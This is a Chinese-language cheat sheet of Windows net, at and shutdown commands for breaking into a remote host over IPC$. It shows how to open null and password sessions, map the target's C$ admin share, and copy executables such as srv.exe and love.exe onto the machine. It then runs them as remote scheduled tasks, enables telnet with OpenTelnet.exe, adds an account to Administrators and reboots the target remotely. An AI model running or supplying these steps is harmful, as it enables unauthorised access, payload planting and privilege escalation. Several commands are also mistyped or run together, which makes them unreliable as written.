1.建立空连接
net use //IP/ipc$ ""/user:""
2.建立非空连接
net use //IP/ipc$ "密码"/user:"用户名"
3.映射默认共享
net use z: //IP/c$ "密码"/user:"用户名"
#(即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 :
net use z: //IP/c$
4.删除一个ipc$连接
net use //IP/ipc$ /del
5.删除共享映射
net use c: /del#删除映射的c盘,其他盘类推
net use * /del#删除全部,会有提示要求按y确认
6.看远程主机的共享资源
net view //IP#(但看不到默认共享)
7.查看本地主机的共享资源
net share#(可以看到本地的默认共享)
8.远程主机的用户名列表
nbtstat-AIP
9.得到本地主机的用户列表
net user
10.查看远程主机的当前时间
net time //IP
11.显示本地主机当前服务
netstart
12.启动/关闭本地服务
netstart服务名 /y
netstop服务名 /y
13.映射远程共享
net use z: //IP/baby
#此命令将共享名为baby的共享资源映射到z盘
14.删除共享映射
net use c: /del#删除映射的c盘,其他盘类推
net use * /del /y#删除全部
15.向远程主机复制文件
copy /路径/srv.exe //IP/共享目录名,
#如: copy ccbirds.exe //*.*.*.*/c 即将当前目录下的文件复制到对方c盘内
16.远程添加计划任务
at //ip 时间 程序名
#如: at //127.0.0.0 11:00 love.exe
#注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
17.开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
1)目标开启了ipc$共享 2)你要拥有管理员密码和帐号 3)目标开启RemoteRegistry服务,用户就该ntlm认证 4)对WIN2K/XP有效,NT未经测试 命令格式:OpenTelnet.exe //server account psw NTLM认证方式 port 试例如下:c:/>OpenTelnet.exe //... administrator "" 1 90
18.激活用户/加入管理员组
net uesr account /active:yes
net localgroup administrators account /add
19.关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe 命令格式:ResumeTelnet.exe //server account psw 试例如下:c:/>ResumeTelnet.exe //... administrator ""
20.删除一个已建立的ipc$连接
net use //IP/ipc$ /del
21.远程关机重启实例
#建立连接
net use \\IP password /user:username
#使用shutdown命令实现关机并重启
shutdown-r-m\\IP-s–t0
#删除连接
net use \\IP /del
